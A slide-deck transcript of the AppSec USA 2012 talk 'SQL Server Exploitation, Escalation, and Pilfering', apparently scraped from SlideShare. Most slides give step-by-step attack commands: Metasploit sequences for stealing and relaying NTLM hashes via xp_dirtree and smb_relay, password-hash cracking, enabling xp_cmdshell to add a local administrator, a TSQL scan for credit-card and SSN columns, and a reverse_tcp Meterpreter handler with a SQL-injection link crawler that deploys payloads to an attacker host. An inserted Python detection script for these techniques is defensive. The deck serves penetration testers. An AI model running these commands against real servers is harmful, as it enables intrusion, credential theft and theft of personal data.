SQL Server Exploitation, Escalation, and Pilfering
                                  AppSec USA 2012

Authors:
Antti Rantasaari
Scott Sutherland
Who are we?

Antti Rantasaari

Scott Sutherland (@_nullbind)

What we do…
• Security consultants at NetSPI
• Pentesters
   ‒ Network
   ‒ Web
   ‒ Thick
• Researchers, bloggers, etc
• Pinball enthusiasts
What are we going to cover?

1.   Database entry points
2.   Domain user → Database user
3.   Database user → OS admin
4.   OS admin → Database admin
5.   Database admin → OS admin
6.   Finding sensitive data
7.   Escalation: Service accounts
8.   Escalation: Database Link Crawling
9.   Conclusions
Why target SQL Servers?

Pentest Goal = Data Access
• It’s deployed everywhere
• Very few “exploits”, but it’s commonly
  misconfigured
• Integrated with Windows and Active
  Directory authentication
• Easy and stable to exploit
Why develop Metasploit tools?

•   I suck at programming
•   Easy to use framework
•   Huge community support
•   Easy management of code (GitHub)
•   Easy distribution of code




http://www.metasploit.com/

https://github.com/rapid7/metasploit-framework
Let’s get started!
Entry Points: Summary
  Unauthenticated Options
  • SQL injections
  • Weak passwords

  Authenticated Options (usually)
  • Other database servers
  • Unencrypted connection
    strings:
     ‒ Files
     ‒ Registry
     ‒ Network
  • ODBC connections
  • Client tools (priv inheritance)
DOMAIN user → DATABASE user
                  Privilege Inheritance
Privilege Inheritance: Summary

The “Domains Users” group is often
provided privileges to login into SQL
Servers…

Evil users just need to:
• Find SQL Servers
• Verify Access
• Attack!
Privilege Inheritance: Find SQL Servers

 Easy SQL Server Discovery = SQLPing v3.0




   http://www.sqlsecurity.com/dotnetnuke/uploads/sqlping3.zip
Privilege Inheritance: Find SQL Servers

      Finding SQL Servers with osql:
Privilege Inheritance: Verify Access
Test current user’s access to SQL Servers with osql:

 FOR /F "tokens=*" %i in ('type sqlservers.txt') do osql -E -S %i -Q "select 'I have access to:'+@@servername"
Privilege Inheritance: Verify Access
Test alternative user’s access to the SQL Servers with
         the MSSQL_SQL Metasploit module:
   msfconsole
   use auxiliary/admin/mssql/mssql_sql
   set RHOST <IP RANGE>
   set RPORT <port>
   set USE_WINDOWS_AUTHENT true
   set DOMAIN <domain>
   set USERNAME <user>
   set PASSWORD <password>
   set SQL <query>
   run

       http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_sql
Privilege Inheritance: Verify Access
Privilege Inheritance: Verify Access
DATABASE USER → OS ADMIN
                SMB Capture/Relay
SMB Capture/Relay: Summary
 SQL Server supports functions that can access files via UNC
 paths using the privileges of the SQL Server service account.

 High level authentication process:
SMB Capture/Relay: Summary

  Stored procedures with UNC support:
      ‒ *xp_dirtree
      ‒ *xp_fileexist
      ‒ xp_getfiledetails

  Possible SMB authentication attacks:

   Service Account        Network Communication   SMB Capture   SMB Relay
   LocalSystem            Computer Account        Yes           No
   NetworkService         Computer Account        Yes           No
   *Local Administrator   Local Administrator     Yes           Yes
   *Domain User           Domain User             Yes           Yes
   *Domain Admin          Domain Admin            Yes           Yes

   http://erpscan.com/press-center/smbrelay-bible-2-smbrelay-by-ms-sql-server/
http://www.netspi.com/blog/2010/07/01/invisible-threats-insecure-service-accounts/
SMB Capture: Diagram
SMB Capture: Start Sniffing for Hashes

 Start Metasploit SMB capture module on your
 evil server to capture seeded password hashes:
  msfconsole
  use auxiliary/server/capture/smb
  set CAINPWFILE /root/cain_hashes.txt
  set JOHNPWFILE /root/john_hashes.txt
  exploit




     http://www.metasploit.com/modules/auxiliary/server/capture/smb
http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Capture: Force MS SQL to Auth

Force SQL Server to authenticate with the modules:
MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI

msfconsole
use auxiliary/admin/mssql/mssql_ntlm_stealer
set USE_WINDOWS_AUTHENT true
set DOMAIN <domain>
set USERNAME <user>
set PASSWORD <password>
set RHOSTS <IP RANGE>
set RPORT <port>
set SMBPROXY <evil server>
run
SMB Capture: Obtain Seeded Hashes

 Obtaining service account hashes from the SQL
 Server should look something like this:
  DOMAIN: DEMO
  USER: serviceaccount

  LMHASH:5e17a06b538a42ae82273227fd61a5952f85252cc731bb25

  NTHASH:763aa16c6882cb1b99d40dfc337b69e7e424d6524a91c03e




     http://www.metasploit.com/modules/auxiliary/server/capture/smb
http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Capture: Crack Hashes

 1. Crack first half of recovered LANMAN hash
    with seeded half LM Rainbow Tables:
        rcracki_mt -h 5e17a06b538a42ae ./halflmchall


 2. Crack the second half with john the ripper
    to obtain case sensitive NTLM password.
        perl netntlm.pl --seed GPP4H1 --file /root/john_hashes.txt



     http://www.metasploit.com/modules/auxiliary/server/capture/smb
http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Relay: Diagram

Very high level overview:




          http://en.wikipedia.org/wiki/SMBRelay
SMB Relay: Setup SMBProxy for Relay

SMB Relay to 3rd Party with the SMB_Relay
Metasploit exploit module:
msfconsole
use exploit/windows/smb/smb_relay
set SMBHOST <targetserver>
exploit

If the service account has the local admin
privileges on the remote system, then a shell
will be returned by the smb_relay module


 http://www.metasploit.com/modules/exploit/windows/smb/smb_relay
SMB Relay: Force MS SQL to Auth

Force SQL Server to authenticate with the modules
MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI
 msfconsole
 use auxiliary/admin/mssql/mssql_ntlm_stealer
 set USE_WINDOWS_AUTHENT true
 set DOMAIN <domain>
 set USERNAME <user>
 set PASSWORD <password>
 set RHOSTS <IP RANGE>
 set RPORT <port>
 set SMBPROXY <evil server>
 run
SMB Relay: Get Meterpreter Shells
SMB Capture/Relay: Using PW or Shell

If meterpreter then:
• Type: shell
• Type: osql -E -Q "whatever you want"

If password:
• Sign in via RDP
• Open a cmd console
• osql -E -Q "whatever you want"
DEMO
Do a crazy dance!




BALLET = NOT CRAZY   DANCING FLY = TOTALLY CRAZY
OS ADMIN → DATABASE ADMIN
          SQL Server Local Authorization Bypass
Local Auth Bypass: Summary

How can we go from OS admin to DB
admin?
• SQL Server 2000 to 2008
  ‒ LocalSystem = Sysadmin privileges


• SQL Server 2012
  ‒ Must migrate to SQL Server service process
    for Sysadmin privileges
Local Auth Bypass: Summary



   Transparent Encryption
             =
       Mostly Useless
(unless local hard drive encryption is in place and key management is
                            done correctly)
Local Auth Bypass: Psexec

On SQL Server 2000 to 2008
Execute queries as sysadmin with osql:
psexec -s cmd.exe
osql -E -S "localhost\sqlexpress" -Q "select is_srvrolemember('sysadmin')"


Execute queries as sysadmin with SSMS:
psexec -i -s ssms



    http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
Local Auth Bypass: Get Shell

Obtain Meterpreter shell using the PSEXEC module
msfconsole
use exploit/windows/smb/psexec
set RHOST <targetserver>
set SMBDOMAIN .
set SMBUSER <user>
set SMBPASS <password>
exploit




  http://www.metasploit.com/modules/exploit/windows/smb/psexec
Local Auth Bypass: Get Sysadmin

     Create sysadmin in database using the Metasploit
     mssql_local_auth_bypass post module:

     In Meterpreter type "background" to return to
     msfconsole. Then, in the msfconsole type:
      use post/windows/manage/mssql_local_auth_bypass
      set session <session>
      set DB_USERNAME <username>
      set DB_PASSWORD <password>
      exploit



http://www.metasploit.com/modules/post/windows/manage/mssql_local_auth_bypass
SQL Server Auth Bypass: Got Sysadmin
Do a crazy whale dance!




To the left…   To the right…   Now dive!
DATABASE ADMIN → OS ADMIN
                   xp_cmdshell
XP_CMDSHELL: Summary




 XP_CMDSHELL = OS COMMAND EXEC



Yes. We know you already know this, but
            don’t forget…
XP_CMDSHELL: Re-Install

Re-install xp_cmdshell
EXEC master..sp_addextendedproc 'xp_cmdshell',
  'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll';
XP_CMDSHELL: Re-Enable

Re-enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
GO

EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
XP_CMDSHELL: Execute Commands

Add Local OS Administrator with
xp_cmdshell

EXEC master..xp_cmdshell 'net user myadmin MyP@sword1'

EXEC master..xp_cmdshell 'net localgroup administrators /add myadmin'
FINDING DATA
Finding Data: Summary

GOAL = Find sensitive data!

•   Credit cards

•   Social security number

•   Medical records
Finding Data: TSQL Script

Simple keywords search via TSQL!
EXEC master..sp_msforeachdb
'SELECT @@Servername as Server_Name,''[?]'' as
Database_name,Table_Name,Column_Name
FROM [?].INFORMATION_SCHEMA.COLUMNS WHERE
Column_Name LIKE ''%password%''
OR Column_Name LIKE ''%Credit%''
OR Column_Name LIKE ''%CCN%''
OR Column_Name LIKE ''%Account%''
OR Column_Name LIKE ''%Social%''
OR Column_Name LIKE ''%SSN%''
ORDER BY Table_name'
Finding Data: Metasploit Module

Database scraping with the
mssql_findandsampledata module!

Features
• Scan multiple servers
• Authenticate with local Windows, Domain
   or SQL credentials
• Sample data
• Number of records found
• Output to screen and CSV file

http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_findandsampledata
Finding Data: Metasploit Module

Launching mssql_findandsampledata:
msfconsole
use auxiliary/admin/mssql/mssql_findandsampledata
set RHOSTS <range>
set RPORT <port>
setg USE_WINDOWS_AUTHENT true
setg DOMAIN <CompanyDomain>
set USERNAME <username>
set PASSWORD <password>
set SAMPLE_SIZE <size>
set KEYWORDS credit|social|password
exploit
Finding Data: Module Output
Finding Data: Demo




          DEMO
Do a crazy cat disco dance!
Escalation: Service Accounts
Shared Service Accounts: Summary

         XP_CMDSHELL
                +
     Shared Service Accounts
                +
             OSQL -E
               =
(more) Unauthorized DATA access
Shared Service Accounts: Diagram
Shared Service Accounts: TSQL Script

XP_CMDSHELL + OSQL = MORE ACCESS!

EXEC master..xp_cmdshell 'osql -E -S HVA -Q "select super.secret.data"'




More examples:
http://www.netspi.com/blog/2011/07/19/when-databases-attack-hacking-
with-the-osql-utility/
Escalation: Database Link Crawling
Database Link Crawling: Summary

Database Links
• Allow one database server to query another
• Often configured with excessive privileges
• Can be chained together
• Use openquery() to query linked servers
• Can be used to execute the infamous
  xp_cmdshell
• Tons of access, no credentials required (via SQL
  injection)
Database Link Crawling: Diagram
Database Link Crawling: List Links

How do I list linked servers?
Two common options:
sp_linkedservers
and
SELECT srvname FROM master..sysservers
Database Link Crawling: List Links

How do I list linked servers on a linked server?
SELECT srvname FROM
openquery(DB1, 'select srvname FROM
master..sysservers')
Database Link Crawling: List Links

How do I list linked servers on the linked
server’s linked server?
SELECT srvname FROM
openquery(DB1,'SELECT srvname FROM
openquery(HVA,''SELECT srvname FROM
master..sysservers'')')
Database Link Crawling: You Get it!

…You get the point.

You can follow links until you run out of links.
Database Link Crawling: Exec Cmds

How do I run commands on a linked server?

SELECT * FROM openquery(DB1,'SELECT * FROM openquery(HVA,''SELECT 1;exec xp_cmdshell ''''ping 192.168.1.1'''' '')')
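Detection logic for what the SMB capture/relay slides (xp_dirtree and friends with UNC paths), the xp_cmdshell re-install/re-enable slides and the link-crawling slides above describe, added here as an example; it is not code from the deck or from the Metasploit modules it mentions. It assumes statements are captured by an Extended Events or SQL Trace session and that the ERRORLOG message formats shown are the standard ones; all sample input is constructed, with DB1/HVA taken from the slides and 10.0.0.99 as a placeholder host.

```python
"""Defender-side triage for the techniques covered in these slides.

Added example, not code from the deck or from the Metasploit modules it
describes.  Two inputs are handled: captured T-SQL statements (as an
Extended Events or SQL Trace session would record them) and SQL Server
ERRORLOG lines.  Every sample below is constructed for this example.
"""
import re

# Extended procedures with UNC support used for SMB capture/relay.
UNC_XP = re.compile(
    r"\b(xp_dirtree|xp_fileexist|xp_getfiledetails)\b.*?['\"]\\\\[\w.-]+", re.I)
# Re-install and re-enable of xp_cmdshell.
ADD_EXTENDED_PROC = re.compile(r"\bsp_addextendedproc\b.*?xp_cmdshell", re.I | re.S)
ENABLE_CMDSHELL = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b", re.I)
# Actual command execution: xp_cmdshell followed by a string literal or a variable.
EXEC_CMDSHELL = re.compile(r"\bxp_cmdshell\s+(N?'|@)", re.I)
OPENQUERY = re.compile(r"\bopenquery\s*\(\s*(\w+)\s*,\s*'", re.I)
# ERRORLOG messages: option change via sp_configure, and first load of xplog70.dll.
ERRORLOG_CONFIG = re.compile(
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")
XPLOG_LOADED = re.compile(r"Using 'xplog70\.dll'.*extended stored procedure 'xp_cmdshell'")


def unwrap_openquery(sql):
    """Peel nested openquery() calls one hop at a time.

    Each nesting level doubles the single quotes, so a hop is recovered by
    taking the quoted argument and collapsing '' back to '.  Returns the
    ordered list of link names and the statement run on the last hop.
    """
    hops, text = [], sql
    while True:
        m = OPENQUERY.search(text)
        if not m:
            return hops, text.strip()
        hops.append(m.group(1))
        out, i = [], m.end()
        while i < len(text):
            if text[i] == "'":
                if text[i + 1:i + 2] == "'":   # doubled quote inside the literal
                    out.append("'")
                    i += 2
                    continue
                break                          # closing quote of this hop
            out.append(text[i])
            i += 1
        text = "".join(out)


def classify_statement(sql):
    """Tag one captured statement with the slide techniques it matches."""
    tags = []
    if UNC_XP.search(sql):
        tags.append("unc_auth_coercion")
    if ADD_EXTENDED_PROC.search(sql):
        tags.append("xp_cmdshell_reinstall")
    if ENABLE_CMDSHELL.search(sql):
        tags.append("xp_cmdshell_enable")
    hops, inner = unwrap_openquery(sql)
    if hops:
        tags.append("link_crawl:" + ">".join(hops))
    if EXEC_CMDSHELL.search(inner):
        tags.append("xp_cmdshell_exec")
    return tags


def scan_errorlog(lines):
    """Return (line_no, finding) for ERRORLOG entries that indicate xp_cmdshell use."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = ERRORLOG_CONFIG.search(line)
        if m and m.group("opt") == "xp_cmdshell" and m.group("new") != "0":
            findings.append((n, "xp_cmdshell_enabled"))
        elif XPLOG_LOADED.search(line):
            findings.append((n, "xp_cmdshell_first_use"))
    return findings


# Constructed samples of what a statement capture and the ERRORLOG would contain.
SAMPLE_STATEMENTS = [
    "SELECT name FROM sys.tables",
    r"EXEC master..xp_dirtree '\\10.0.0.99\share'",
    r"EXEC master..sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'",
    "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
    "SELECT * FROM openquery(DB1,'SELECT * FROM openquery(HVA,"
    "''SELECT 1;exec xp_cmdshell ''''ping 192.168.1.1'''' '')')",
]
SAMPLE_ERRORLOG = [
    "2012-10-25 10:02:11.43 spid51 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2012-10-25 10:02:11.50 spid51 Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2012-10-25 10:02:12.01 spid51 Using 'xplog70.dll' version '2011.110.2100' to execute extended stored procedure 'xp_cmdshell'. This is an informational message only; no user action is required.",
]

if __name__ == "__main__":
    for stmt in SAMPLE_STATEMENTS:
        print(classify_statement(stmt) or ["clean"], "<-", stmt[:60])
    for line_no, finding in scan_errorlog(SAMPLE_ERRORLOG):
        print("ERRORLOG line", line_no, finding)
```

The unwrap step is the part worth keeping: alerting on the innermost statement rather than on the raw nested text is what lets a rule for xp_cmdshell fire regardless of how many links the query was pushed through.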
Database Link Crawling: Modules

Two Modules
1. Direct connection
2. SQL Injection

Available for Download
• Not submitted to Metasploit trunk – Yet
• Downloads available from nullbind’s github
  ‒ mssql_linkcrawler.rb
  ‒ mssql_linkcrawler_sqli.rb
Database Link Crawling: Modules

• Features
  ‒ Crawl SQL Server database links
  ‒ Standard Crawl output
  ‒ Verbose Crawl output
  ‒ Output to CSV file
  ‒ Supports 32 and 64 bit Windows
  ‒ Global Metasploit payload deployment
  ‒ Targeted Metasploit payload deployment
  ‒ Payload deployment via powershell memory
    injection
Metasploit Module: Run multi/handler

Setup the multi/handler module:
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 443
set ExitOnSession false
exploit -j -z
Metasploit Module: Link Crawler

Setup the mssql_linkcrawler_sqli module:
use exploit/windows/mssql/mssql_linkcrawler_sqli
set GET_PATH /employee.asp?id=1;[SQLi];--
set type blind
set RHOST 192.168.1.100
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.130
set lport 443
set DisablePayloadHandler true
exploit
Database Link Crawling: Attack!
Database Link Chaining: Demo




         DEMO
Do a crazy cat disco dance!




      Yes. It warrants 2 disco cats!
Database Link Chaining: Modules

Current Constraints
• Cannot crawl through SQL Server 2000
• Cannot enable xp_cmdshell through links
• Cannot deliver payloads to systems without
  powershell (at the moment)
• Currently, the module leaves a powershell
  process running on exit
• Currently, doesn’t allow arbitrary query
  execution on linked servers
Conclusions




      configure all accounts with

   LEAST PRIVILEGE
            system accounts
            service accounts
           database accounts
          application accounts
Conclusions



                always

    VALIDATE INPUT
               web apps
               thick apps
              mobile apps
              web services
Conclusions



              Configure

      SMB SIGNING
Conclusions



              don’t do

         DRUGS
Questions

Antti Rantasaari
Email: antti.rantasaari@netspi.com

Scott Sutherland
Email: scott.sutherland@netspi.com
Blog: http://www.netspi.com/blog/author/ssutherland/
Github: http://www.github.com/nullbind/
Twitter: @_nullbind


Presentation Slides
http://www.slideshare.net/nullbind/sql-serverexploitationescalationandpilferingapp-secusa2012

 
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360
 
Declaration of malWARe
Declaration of malWAReDeclaration of malWARe
Declaration of malWARe
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
 

Recently uploaded

Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Product School
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
Dorra BARTAGUIZ
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
RTTS
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Ramesh Iyer
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Thierry Lestable
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 

Recently uploaded (20)

Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 

SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012

  • 1. SQL Server Exploitation, Escalation, and Pilfering AppSec USA 2012 Authors: Antti Rantasaari Scott Sutherland
  • 2. Who are we? Antti Rantasaari Scott Sutherland (@_nullbind) What we do… • Security consultants at NetSPI • Pentesters ‒ Network ‒ Web ‒ Thick • Researchers, bloggers, etc • Pinball enthusiasts
